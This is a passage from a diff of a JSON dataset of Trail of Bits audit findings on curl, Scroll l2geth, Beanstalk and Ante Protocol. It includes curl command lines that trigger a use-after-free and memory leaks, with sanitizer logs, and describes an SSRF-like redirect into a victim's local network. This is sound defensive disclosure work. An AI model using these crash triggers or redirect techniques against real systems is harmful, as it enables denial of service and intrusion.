ErrAlreadyKnown } // Make the local flag. If it's from local source or it's from the network but // the sender is marked as local previously, treat it as the local transaction. isLocal := local || pool.locals.containsTx(tx) if pool.chainconfig.Scroll.FeeVaultEnabled() { if err := fees.VerifyFee(pool.signer, tx, pool.currentState); err != nil { Figure 6.1: TxPool.add() calls fees.VerifyFee() before any other transaction validators are called. (go-ethereum/core/tx_pool.go#684697) func VerifyFee(signer types.Signer, tx *types.Transaction, state StateDB) error { from, err := types.Sender(signer, tx) if err != nil { return errors.New(\"invalid transaction: invalid sender\") } Figure 6.2: VerifyFee() initiates an ECDSA recovery operation via types.Sender(). (go-ethereum/rollup/fees/rollup_fee.go#198202) Exploit Scenario An attacker generates a denial-of-service attack against the sequencer by submitting extraordinarily large transactions. Because ECDSA recovery is a CPU-intensive operation and is executed before the transaction size is checked, the attacker is able to exhaust the memory resources of the sequencer. Recommendations Short term, modify the code to check for L1 fees in the TxPool.validateTx() function immediately after that function calls types.Sender(). This will ensure that other, less expensive-to-check validations are performed before the ECDSA signature is recovered. Long term, exercise caution when making changes to code paths that validate information received from public sources or gossip. For changes to the transaction pool, a good general rule of thumb is to validate transaction criteria in the following order: 1. Simple, in-memory criteria that do not require disk reads or data manipulation 2. Criteria that require simple, in-memory manipulations of the data such as checks of the transaction size 3. Criteria that require an in-memory state trie to be checked 4. ECDSA recovery operations 5. Criteria that require an on-disk state trie to be checked However, note that sometimes these criteria must be checked out of order; for example, the ECDSA recovery operation to identify the origin account may need to be performed before the state trie is checked to determine whether the account can aord the transaction.", "labels": [ "Trail of Bits", "Severity: Low", @@ -1540,29 +1530,29 @@ ] }, { - "title": "10. Use after free while using parallel option and sequences ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "Using cURL with parallel option ( -Z ), two consecutive sequences (that end up creating 51 hosts), and an unmatched bracket triggers a use-after-free vulnerability (gure 10.1). The add_parallel_transfers function allocates memory blocks for an error buer; consequently, by default, it allows up to 50 transfers (gure 10.2, line 2228). Then, in the Curl_failf function, it copies errors (e.g., Could not resolve host: q{ ) to appropriate error buers when connections fail (gure 10.3) and frees the memory. For the last sequence ( u~ host), it allocates a memory buer (gure 10.2), frees a buer (gure 10.3), and copies an error ( Could not resolve host: u~ ) to the previously freed memory buer (gure 10.4). $ curl 0 -Z [q-u][u-~] } curl: (7) Failed to connect to 0.0.0.0 port 80 after 0 ms: Connection refused curl: (3) unmatched close brace/bracket in URL position 1: } ^ curl: (6) Could not resolve host: q{ curl: (6) Could not resolve host: q| curl: (6) Could not resolve host: q} curl: (6) Could not resolve host: q~ curl: (6) Could not resolve host: r{ curl: (6) Could not resolve host: r| curl: (6) Could not resolve host: r} curl: (6) Could not resolve host: r~ curl: (6) Could not resolve host: s{ curl: (6) Could not resolve host: s| curl: (6) Could not resolve host: s} curl: (6) Could not resolve host: s~ curl: (6) Could not resolve host: t{ curl: (6) Could not resolve host: t| curl: (6) Could not resolve host: t} curl: (6) Could not resolve host: t~ curl: (6) Could not resolve host: u{ curl: (6) Could not resolve host: u| curl: (6) Could not resolve host: u} curl: (3) unmatched close brace/bracket in URL position 1: } ^ ====2789144==ERROR: AddressSanitizer: heap-use-after-free on address 0x611000004780 at pc 0x7f9b5f94016d bp 0x7fff12d4dbc0 sp 0x7fff12d4d368 WRITE of size #0 0x7f9b5f94016c in __interceptor_strcpy ../../../../src/libsanitizer/asan/asan_interceptors. cc : 431 #1 0x7f9b5f7ce6f4 in strcpy /usr/ include /x86_64-linux-gnu/bits/string_fortified. h : 90 #2 0x7f9b5f7ce6f4 in Curl_failf /home/scooby/curl/lib/sendf. c : 275 #3 0x7f9b5f78309a in Curl_resolver_error /home/scooby/curl/lib/hostip. c : 1316 #4 0x7f9b5f73cb6f in Curl_resolver_is_resolved /home/scooby/curl/lib/asyn-thread. c : 596 #5 0x7f9b5f7bc77c in multi_runsingle /home/scooby/curl/lib/multi. c : 1979 #6 0x7f9b5f7bf00f in curl_multi_perform /home/scooby/curl/lib/multi. c : 2684 #7 0x55d812f7609e in parallel_transfers /home/scooby/curl/src/tool_operate. c : 2308 #8 0x55d812f7609e in run_all_transfers /home/scooby/curl/src/tool_operate. c : 2618 #9 0x55d812f7609e in operate /home/scooby/curl/src/tool_operate. c : 2732 #10 0x55d812f4ffa8 in main /home/scooby/curl/src/tool_main. c : 276 #11 0x7f9b5f1aa082 in __libc_start_main ../csu/libc- start . c : 308 #12 0x55d812f506cd in _start (/usr/ local /bin/curl+ 0x316cd ) 0x611000004780 is located 0 bytes inside of 256-byte region [0x611000004780,0x611000004880) freed by thread T0 here: #0 0x7f9b5f9b140f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122 #1 0x55d812f75682 in add_parallel_transfers /home/scooby/curl/src/tool_operate.c:2251 previously allocated by thread T0 here: #0 0x7f9b5f9b1808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x55d812f75589 in add_parallel_transfers /home/scooby/curl/src/tool_operate.c:2228 SUMMARY: AddressSanitizer: heap-use-after-free ../../../../src/libsanitizer/asan/asan_interceptors.cc:431 in __interceptor_strcpy Shadow bytes around the buggy address: 0x0c227fff88a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff88b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff88c0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c227fff88d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff88e0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa =>0x0c227fff88f0:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff8900: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff8910: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c227fff8920: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c227fff8930: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa 0x0c227fff8940: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Heap left redzone: fa Freed heap region: fd ==2789144==ABORTING Figure 10.1: Reproducing use-after-free vulnerability with ASAN log 2192 static CURLcode add_parallel_transfers ( struct GlobalConfig *global, CURLM *multi, CURLSH *share, bool *morep, bool *addedp) 2197 { // (...) 2210 for (per = transfers; per && (all_added < global->parallel_max); per = per->next) { 2227 2228 // (...) 2249 if (!errorbuf) { errorbuf = malloc(CURL_ERROR_SIZE); result = create_transfer(global, share, &getadded); 2250 2251 2252 2253 if (result) { free(errorbuf); return result; } Figure 10.2: The add_parallel_transfers function ( curl/src/tool_operate.c#21922253 ) 264 265 { void Curl_failf ( struct Curl_easy *data, const char *fmt, ...) // (...) 275 strcpy(data->set.errorbuffer, error); Figure 10.3: The Curl_failf function that copies appropriate error to the error buer ( curl/lib/sendf.c#264275 ) Exploit Scenario An administrator sets up a service that calls cURL, where some of the cURL command-line arguments are provided from external, untrusted input. An attacker manipulates the input to exploit the use-after-free bug to run arbitrary code on the machine that runs cURL. Recommendations Short term, x the use-after-free vulnerability described in this nding. Long term, extend the fuzzing strategy to cover argv fuzzing. It can be obtained using the argv-fuzz-inl.h from the AFL++ project to build argv from stdin in the cURL. Also, consider adding a dictionary with possible options and protocols to the fuzzer based on the source code or cURLs manual.", + "title": "1. Transaction pool fails to drop transactions that cannot a\u0000ord L1 fees ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "l2geth denes two fees that must be paid for L2 transactions: an L2 fee and an L1 fee. However, the code fails to account for L1 fees; as a result, transactions that cannot aord the combined L1 and L2 fees may be included in a block rather than demoted, as intended. The transaction.go le denes a Cost() function that returns the amount of ether that a transaction consumes, as shown in gure 1.1. The current implementation of Cost() does not account for L1 fees, causing other parts of the codebase to misjudge the balance requirements to execute a transaction. The correct implementation of Cost() should match the implementation of VerifyFee(), which correctly checks for L1 fees. // Cost returns gas * gasPrice + value. func (tx *Transaction) Cost() *big.Int { total := new(big.Int).Mul(tx.GasPrice(), new(big.Int).SetUint64(tx.Gas())) total.Add(total, tx.Value()) return total } Figure 1.1: The Cost() function does not include L1 fees in its calculation. (go-ethereum/core/types/transaction.go#318323) Most notably, Cost() is consumed by the tx_list.Filter() function, which is used to prune un-executable transactions (transactions that cannot aord the fees), as shown in gure 1.2. The failure to account for L1 fees in Cost() could cause tx_list.Filter() to fail to demote such transactions, causing them to be incorrectly included in the block. func (l *txList) Filter(costLimit *big.Int, gasLimit uint64) (types.Transactions, types.Transactions) { // If all transactions are below the threshold, short circuit if l.costcap.Cmp(costLimit) <= 0 && l.gascap <= gasLimit { return nil, nil } l.costcap = new(big.Int).Set(costLimit) // Lower the caps to the thresholds l.gascap = gasLimit // Filter out all the transactions above the account's funds removed := l.txs.Filter(func(tx *types.Transaction) bool { return tx.Gas() > gasLimit || tx.Cost().Cmp(costLimit) > 0 }) Figure 1.2: Filter() uses Cost() to determine which transactions to demote. (go-ethereum/core/tx_list.go#332343) Exploit Scenario A user creates an L2 transaction that can just barely aord the L1 and L2 fees in the next upcoming block. Their transaction is delayed due to full blocks and is included in a future block in which the L1 fees have risen. Their transaction reverts due to the increased L1 fees instead of being ejected from the transaction pool. Recommendations Short term, refactor the Cost() function to account for L1 fees, as is done in the VerifyFee() function; alternatively, have the transaction list structure use VerifyFee() or a similar function instead of Cost(). Long term, add additional tests to verify complex state transitions such as a transaction becoming un-executable due to changes in L1 fees.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Informational", "Difficulty: Low" ] }, { - "title": "11. Unused memory blocks are not freed resulting in memory leaks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "For specic commands (gure 11.1, 11.2, 11.3), cURL allocates blocks of memory that are not freed when they are no longer needed, leading to memory leaks. $ curl 0 -Z 0 -Tz 0 curl: Can 't open ' z '! curl: try ' curl --help ' or ' curl --manual' for more information curl: ( 26 ) Failed to open/read local data from file/application ============= 2798000 ==ERROR: LeakSanitizer: detected memory leaks Direct leak of 4848 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eba06 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:153 #1 0x561bb1d1dc9f in glob_url /home/scooby/curl/src/tool_urlglob.c:459 Indirect leak of 8 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eb808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x561bb1d1e06c in glob_fixed /home/scooby/curl/src/tool_urlglob.c:48 #2 0x561bb1d1e06c in glob_parse /home/scooby/curl/src/tool_urlglob.c:411 #3 0x561bb1d1e06c in glob_url /home/scooby/curl/src/tool_urlglob.c:467 Indirect leak of 2 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eb808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x561bb1d1e0b0 in glob_fixed /home/scooby/curl/src/tool_urlglob.c:53 #2 0x561bb1d1e0b0 in glob_parse /home/scooby/curl/src/tool_urlglob.c:411 #3 0x561bb1d1e0b0 in glob_url /home/scooby/curl/src/tool_urlglob.c:467 Indirect leak of 2 byte(s) in 1 object(s) allocated from: #0 0x7f868e6eb808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x561bb1d1dc6a in glob_url /home/scooby/curl/src/tool_urlglob.c:454 Figure 11.1: Reproducing memory leaks vulnerability in the tool_urlglob.c le with LeakSanitizer log. $ curl 00 --cu 00 curl: ( 7 ) Failed to connect to 0 .0.0.0 port 80 after 0 ms: Connection refused ============= 2798691 ==ERROR: LeakSanitizer: detected memory leaks Direct leak of 3 byte(s) in 1 object(s) allocated from: #0 0x7fbc6811b3ed in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cc:445 #1 0x56412ed047ee in getparameter /home/scooby/curl/src/tool_getparam.c:1885 SUMMARY: AddressSanitizer: 3 byte(s) leaked in 1 allocation(s). Figure 11.2: Reproducing a memory leak vulnerability in the tool_getparam.c le with LeakSanitizer log $ curl --proto = 0 --proto = 0 Warning: unrecognized protocol '0' Warning: unrecognized protocol '0' curl: no URL specified! curl: try 'curl --help' or 'curl --manual' for more information ================================================================= == 2799783 ==ERROR: LeakSanitizer: detected memory leaks Direct leak of 1 byte(s) in 1 object(s) allocated from: #0 0x7f90391803ed in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cc:445 #1 0x55e405955ab7 in proto2num /home/scooby/curl/src/tool_paramhlp.c:385 SUMMARY: AddressSanitizer: 1 byte(s) leaked in 1 allocation(s). Figure 11.3: Reproducing a memory leak vulnerability in the tool_paramhlp.c le with LeakSanitizer log Exploit Scenario An attacker nds a way to allocate extensive lots of memory on the local machine, which leads to the overconsumption of resources and a denial-of-service attack. Recommendations Short term, x memory leaks described in this nding by freeing memory blocks that are no longer needed. Long term, extend the fuzzing strategy to cover argv fuzzing. It can be obtained using the argv-fuzz-inl.h from the AFL++ project to build argv from stdin in the cURL. Also, consider adding a dictionary with possible options and protocols to the fuzzer based on the source code or cURLs manual.", + "title": "6. Risk of transaction pool admission denial of service ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "l2geths changes to the transaction pool include an ECDSA recovery operation at the beginning of the pools transaction validation logic, introducing a denial-of-service vector: an attacker could generate invalid transactions to exhaust the sequencers resources. l2geth adds an L1 fee that all L2 transactions must pay. To verify that an L2 transaction can aord the L1 fee, the transaction pool calls fees.VerifyFee(), as shown in gure 6.1. VerifyFee() performs an ECDSA recovery operation to determine the account that will pay the L1 fee, as shown in gure 6.2. ECDSA key recovery is an expensive operation that should be executed as late in the transaction validation process as possible in order to reduce the impact of denial-of-service attacks. func (pool *TxPool) add(tx *types.Transaction, local bool) (replaced bool, err error) { // If the transaction is already known, discard it hash := tx.Hash() if pool.all.Get(hash) != nil { log.Trace(\"Discarding already known transaction\", \"hash\", hash) knownTxMeter.Mark(1) return false, ErrAlreadyKnown } // Make the local flag. If it's from local source or it's from the network but // the sender is marked as local previously, treat it as the local transaction. isLocal := local || pool.locals.containsTx(tx) if pool.chainconfig.Scroll.FeeVaultEnabled() { if err := fees.VerifyFee(pool.signer, tx, pool.currentState); err != nil { Figure 6.1: TxPool.add() calls fees.VerifyFee() before any other transaction validators are called. (go-ethereum/core/tx_pool.go#684697) func VerifyFee(signer types.Signer, tx *types.Transaction, state StateDB) error { from, err := types.Sender(signer, tx) if err != nil { return errors.New(\"invalid transaction: invalid sender\") } Figure 6.2: VerifyFee() initiates an ECDSA recovery operation via types.Sender(). (go-ethereum/rollup/fees/rollup_fee.go#198202) Exploit Scenario An attacker generates a denial-of-service attack against the sequencer by submitting extraordinarily large transactions. Because ECDSA recovery is a CPU-intensive operation and is executed before the transaction size is checked, the attacker is able to exhaust the memory resources of the sequencer. Recommendations Short term, modify the code to check for L1 fees in the TxPool.validateTx() function immediately after that function calls types.Sender(). This will ensure that other, less expensive-to-check validations are performed before the ECDSA signature is recovered. Long term, exercise caution when making changes to code paths that validate information received from public sources or gossip. For changes to the transaction pool, a good general rule of thumb is to validate transaction criteria in the following order:", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Medium" + "Severity: Low", + "Difficulty: Low" ] }, { - "title": "12. Referer header is generated in insecure manner ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "The cURL automatically sets the referer header for HTTP redirects when provided with the --referer ;auto ag. The header set contains the entire original URL except for the user-password fragment. The URL includes query parameters, which is against current best practices for handling the referer , which say to default to the strict-origin-when-cross-origin option. The option instructs clients to send only the URLs origin for cross-origin redirect, and not to send the header to less secure destinations (e.g., when redirecting from HTTPS to HTTP protocol). Exploit Scenario An user uses cURL to send a request to a server that requires multi-step authorization. He provides the authorization token as a query parameter and enables redirects with --location ag. Because of the server misconguration, a 302 redirect response with an incorrect Location header that points to a third-party domain is sent back to the cURL. The cURL requests the third-party domain, leaking the authorization token via the referer header. Recommendations Short term, send only the origin instead of the whole URL on cross-origin requests in the referer header. Consider not sending the header on redirects downgrading the security level. Additionally, consider implementing support for the Referrer-Policy response header. Alternatively, introduce a new ag that would allow users to set the desired referrer policy manually. Long term, review response headers that change behavior of HTTP redirects and ensure either that they are supported by the cURL or that secure defaults are implemented. References Feature: Referrer Policy: Default to strict-origin-when-cross-origin", + "title": "7. Syncing nodes fail to check consensus rule for L1 message count ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "l2geth adds a consensus rule requiring that there be no more than L1Config.NumL1MessagesPerBlock number of L1 messages per L2 block. This rule is checked by the sequencer when building new blocks but is not checked by syncing nodes through the ValidateL1Messages function, as shown in gure 7.1. // TODO: consider adding a rule to enforce L1Config.NumL1MessagesPerBlock. // If there are L1 messages available, sequencer nodes should include them. // However, this is hard to enforce as different nodes might have different views of L1. Figure 7.1: The ValidateL1Messages function does not check the NumL1MessagesPerBlock restriction. (go-ethereum/core/block_validator.go#145147) The TODO comment shown in the gure expresses a concern that syncing nodes cannot enforce NumL1MessagesPerBlock due to the dierent view of L1 that the nodes may have; however, this issue does not prevent syncing nodes from simply checking the number of L1 messages included in the block. Exploit Scenario A malicious sequencer ignores the NumL1MessagesPerBlock restriction while constructing a block, thus bypassing the consensus rules. Follower nodes consider the block to be valid even though the consensus rule is violated. Recommendations Short term, add a check to ValidateL1Messages to check the maximum number of L1 messages per block restriction. Long term, document and check all changes to the systems consensus rules to ensure that both nodes that construct blocks and nodes that sync blocks check the consensus rules. This includes having syncing nodes check whether an L1 transaction actually exists on the L1, a concern expressed in comments further up in the ValidateL1Messages function. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", "Severity: Low", @@ -1570,239 +1560,2939 @@ ] }, { - "title": "13. Redirect to localhost and local network is possible (Server-side request forgery like) ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "When redirects are enabled with cURL (i.e., the --location ag is provided), then a server may redirect a request to an arbitrary endpoint, and the cURL will issue a request to it. This gives requested servers partial access to cURLs users local networks. The issue is similar to the Server-Side Request Forgery (SSRF) attack vector, but in the context of the client application. Exploit Scenario An user sends a request using cURL to a malicious server using the --location ag. The server responds with a 302 redirect to http://192.168.0.1:1080?malicious=data endpoint, accessing the user's router admin panel. Recommendations Short term, add a warning about this attack vector in the --location ag documentation. Long term, consider disallowing redirects to private networks and loopback interface by either introducing a new ag that would disable the restriction or extending the --location-trusted ag functionality.", + "title": "1. Attackers could mint more Fertilizer than intended due to an unused variable ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", + "body": "Due to an unused local variable, an attacker could mint more Fertilizer than should be allowed by the sale. The mintFertilizer() function checks that the _amount variable is no greater than the remaining variable; this ensures that more Fertilizer than intended cannot be minted; however, the _amount variable is not used in subsequent function callsinstead, the amount variable is used; the code eectively skips this check, allowing users to mint more Fertilizer than required to recapitalize the protocol. function mintFertilizer ( uint128 amount , uint256 minLP , LibTransfer.From mode ) external payable { uint256 remaining = LibFertilizer.remainingRecapitalization(); uint256 _amount = uint256 (amount); if (_amount > remaining) _amount = remaining; LibTransfer.receiveToken( C.usdc(), uint256 ( amount ).mul(1e6), msg.sender , mode ); uint128 id = LibFertilizer.addFertilizer( uint128 (s.season.current), amount , minLP ); C.fertilizer().beanstalkMint( msg.sender , uint256 (id), amount , s.bpf); } Figure 1.1: The mintFertilizer() function in FertilizerFacet.sol#L35- Note that this aw can be exploited only once: if users mint more Fertilizer than intended, the remainingRecapitalization() function returns 0 because the dollarPerUnripeLP() and unripeLP() . totalSupply() variables are constants. function remainingRecapitalization() internal view returns (uint256 remaining) { } AppStorage storage s = LibAppStorage.diamondStorage(); uint256 totalDollars = C .dollarPerUnripeLP() .mul(C.unripeLP().totalSupply()) .div(DECIMALS); if (s.recapitalized >= totalDollars) return 0; return totalDollars.sub(s.recapitalized); Figure 1.2: The remainingRecapitalization() function in LibFertilizer.sol#L132-145 Exploit Scenario Recapitalization of the Beanstalk protocol is almost complete; only 100 units of Fertilizer for sale remain. Eve, a malicious user, calls mintFertilizer() with an amount of 10 million, signicantly over-funding the system. Because the Fertilizer supply increased signicantly above the theoretical maximum, other users are entitled to a much smaller yield than expected. Recommendations Short term, use _amount instead of amount as the parameter in the functions that are called after mintFertilizer() . Long term, thoroughly document the expected behavior of the FertilizerFacet contract and the properties (invariants) it should enforce, such as token amounts above the maximum recapitalization threshold cannot be sold. Expand the unit test suite to test that these properties hold.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "14. URL parsing from redirect is incorrect when no path separator is provided ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "When cURL parses a URL from the Location header for an HTTP redirect and the URL does not contain a path separator (/), the cURL incorrectly duplicates query strings (i.e., data after the question mark) and fragments (data after cross). The cURL correctly parses similar URLs when they are provided directly in the command line. This behavior indicates that dierent parsers are used for direct URLs and URLs from redirects, which may lead to further bugs. $ curl -v -L 'http://local.test?redirect=http://local.test:80?-123' * Trying 127 .0.0.1:80... * Connected to local.test ( 127 .0.0.1) port 80 ( #0) > GET /?redirect=http://local.test:80?-123 HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 302 Found < Location: http://local.test:80?-123 < Date: Mon, 10 Oct 2022 14 :53:46 GMT < Connection: keep-alive < Keep-Alive: timeout = 5 < Transfer-Encoding: chunked < * Ignoring the response-body * Connection #0 to host local.test left intact * Issue another request to this URL: 'http://local.test:80/?-123?-123' * Found bundle for host: 0x6000039287b0 [serially] * Re-using existing connection #0 with host local.test * Connected to local.test ( 127 .0.0.1) port 80 ( #0) > GET /?-123?-123 HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Mon, 10 Oct 2022 14 :53: < Connection: keep-alive < Keep-Alive: timeout = 5 < Content-Length: 16 < * Connection #0 to host local.test left intact HTTP Connection! Figure 14.1: Example logging output from cURL, presenting the bug in parsing URLs from the Location header, with port and query parameters $ curl -v -L 'http://local.test?redirect=http://local.test%23-123' * Trying 127 .0.0.1:80... * Connected to local.test ( 127 .0.0.1) port 80 ( #0) > GET /?redirect=http://local.test%23-123 HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 302 Found < Location: http://local.test#-123 < Date: Mon, 10 Oct 2022 14 :56:05 GMT < Connection: keep-alive < Keep-Alive: timeout = 5 < Transfer-Encoding: chunked < * Ignoring the response-body * Connection #0 to host local.test left intact * Issue another request to this URL: 'http://local.test/#-123#-123' * Found bundle for host: 0x6000003f47b0 [serially] * Re-using existing connection #0 with host local.test * Connected to local.test ( 127 .0.0.1) port 80 ( #0) > GET / HTTP/1.1 > Host: local.test > User-Agent: curl/7.86.0-DEV > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK < Date: Mon, 10 Oct 2022 14 :56:05 GMT < Connection: keep-alive < Keep-Alive: timeout = 5 < Content-Length: 16 < * Connection #0 to host local.test left intact HTTP Connection! Figure 14.2: Example logging output from cURL, presenting the bug in parsing URLs from Location header, without port and with fragment Exploit Scenario A user of cURL accesses data from a server. The server redirects cURL to another endpoint. cURL incorrectly duplicates the query string in the new request. The other endpoint uses the incorrect data, which negatively aects the user. Recommendations Short term, x the parsing bug in the Location header parser. Long term, use a single, centralized API for URL parsing in the whole cURL codebase. Expand tests with checks of parsing of redirect responses.", + "title": "2. Lack of a two-step process for ownership transfer ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", + "body": "The transferOwnership() function is used to change the owner of the Beanstalk protocol. This function calls the setContractOwner() function, which immediately sets the contracts new owner. Transferring ownership in one function call is error-prone and could result in irrevocable mistakes. function transferOwnership ( address _newOwner ) external override { LibDiamond.enforceIsContractOwner(); LibDiamond.setContractOwner(_newOwner); } Figure 2.1: The transferOwnership() function in OwnershipFacet.sol#L13-16 Exploit Scenario The owner of the Beanstalk contracts is a community controlled multisignature wallet. The community agrees to upgrade to an on-chain voting system, but the wrong address is mistakenly provided to its call to transferOwnership() , permanently misconguring the system. Recommendations Short term, implement a two-step process to transfer contract ownership, in which the owner proposes a new address and then the new address executes a call to accept the role, completing the transfer. Long term, identify and document all possible actions that can be taken by privileged accounts and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: High", "Difficulty: High" ] }, { - "title": "1. AntePoolFactory does not validate create2 return addresses ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", - "body": "The AntePoolFactory uses the create2 instruction to deploy an AntePool and then initializes it with an already-deployed AnteTest address. However, the AntePoolFactory does not validate the address returned by create2, which will be the zero address if the deployment operation fails. bytes memory bytecode = type(AntePool).creationCode; bytes32 salt = keccak256(abi.encodePacked(testAddr)); assembly { testPool := create2(0, add(bytecode, 0x20), mload(bytecode), salt) } poolMap[testAddr] = testPool; allPools.push(testPool); AntePool(testPool).initialize(anteTest); emit AntePoolCreated(testAddr, testPool); Figure 1.1: contracts/AntePoolFactory.sol#L35-L47 This lack of validation does not currently pose a problem, because the simplicity of AntePool contracts helps prevent deployment failures (and thus the return of the zero address). However, deployment issues could become more likely in future iterations of the Ante Protocol. Recommendations Short term, have the AntePoolFactory check the address returned by the create2 operation against the zero address. Long term, ensure that the results of operations that return a zero address in the event of a failure (such as create2 and ecrecover operations) are validated appropriately.", + "title": "3. Possible underow could allow more Fertilizer than MAX_RAISE to be minted ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-07-beanstalk-securityreview.pdf", + "body": "The remaining() function could underow, which could allow the Barn Raise to continue indenitely. Fertilizer is an ERC1155 token issued for participation in the Barn Raise, a community fundraiser intended to recapitalize the Beanstalk protocol with Bean and liquidity provider (LP) tokens that were stolen during the April 2022 governance hack. Fertilizer entitles holders to a pro rata portion of one-third of minted Bean tokens if the Fertilizer token is active, and it can be minted as long as the recapitalization target ($77 million) has not been reached. Users who want to buy Fertilizer call the mint() function and provide one USDC for each Fertilizer token they want to mint. function mint(uint256 amount) external payable nonReentrant { uint256 r = remaining(); if (amount > r) amount = r; __mint(amount); IUSDC.transferFrom(msg.sender, CUSTODIAN, amount); } Figure 3.1: The mint() function in FertilizerPremint.sol#L51-56 The mint() function rst checks how many Fertilizer tokens remain to be minted by calling the remaining() function (gure 3.2); if the user is trying to mint more Fertilizer than available, the mint() function mints all of the Fertilizer tokens that remain. function remaining() public view returns (uint256) { return MAX_RAISE - IUSDC.balanceOf(CUSTODIAN); } Figure 3.2: The remaining() function in FertilizerPremint.sol#L84- However, the FertilizerPremint contract does not use Solidity 0.8, so it does not have native overow and underow protection. As a result, if the amount of Fertilizer purchased reaches MAX_RAISE (i.e., 77 million), an attacker could simply send one USDC to the CUSTODIAN wallet to cause the remaining() function to underow, allowing the sale to continue indenitely. In this particular case, Beanstalk protocol funds are not at risk because all the USDC used to purchase Fertilizer tokens is sent to a Beanstalk community-owned multisignature wallet; however, users who buy Fertilizer after such an exploit would lose the gas funds they spent, and the project would incur further reputational damage. Exploit Scenario The Barn Raise is a total success: the MAX_RAISE amount is hit, meaning that 77 million Fertilizer tokens have been minted. Alice, a malicious user, notices the underow risk in the remaining() function; she sends one USDC to the CUSTODIAN wallet, triggering the underow and causing the function to return the maxuint256 instead of MAX_RAISE . As a result, the sale continues even though the MAX_RAISE amount was reached. Other users, not knowing that the Barn Raise should be complete, continue to successfully mint Fertilizer tokens until the bug is discovered and the system is paused to address the issue. While no Beanstalk funds are lost as a result of this exploit, the users who continued minting Fertilizer after the MAX_RAISE was reached lose all the gas funds they spent. Recommendations Short term, add a check in the remaining() function so that it returns 0 if USDC.balanceOf(CUSTODIAN) is greater than or equal to MAX_RAISE . This will prevent the underow from being triggered. Because the function depends on the CUSTODIAN s balance, it is still possible for someone to send USDC directly to the CUSTODIAN wallet and reduce the amount of available Fertilizer; however, attackers would lose their money in the process, meaning that there are no incentives to perform this kind of action. Long term, thoroughly document the expected behavior of the FertilizerPremint contract and the properties (invariants) it should enforce, such as no tokens can be minted once the MAX_RAISE is reached. Expand the unit test suite to test that these properties hold.", "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "2. Events emitted during critical operations omit certain details ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/AnteProtocol.pdf", - "body": "Events are generally emitted for all critical state-changing operations within the system. However, the AntePoolCreated event emitted by the AntePoolFactory does not capture the address of the msg.sender that deployed the AntePool. This information would help provide a more complete audit trail in the event of an attack, as the msg.sender often refers to the externally owned account that sent the transaction but could instead refer to an intermediate smart contract address. emit AntePoolCreated(testAddr, testPool); Figure 2.1: contracts/AntePoolFactory.sol#L47 Additionally, consider having the AntePool.updateDecay method emit an event with the pool share parameters used in decay calculations. Recommendations Short term, capture the msg.sender in the AntePoolFactory.AntePoolCreated event, and have AntePool.updateDecay emit an event that includes the relevant decay calculation parameters. Long term, 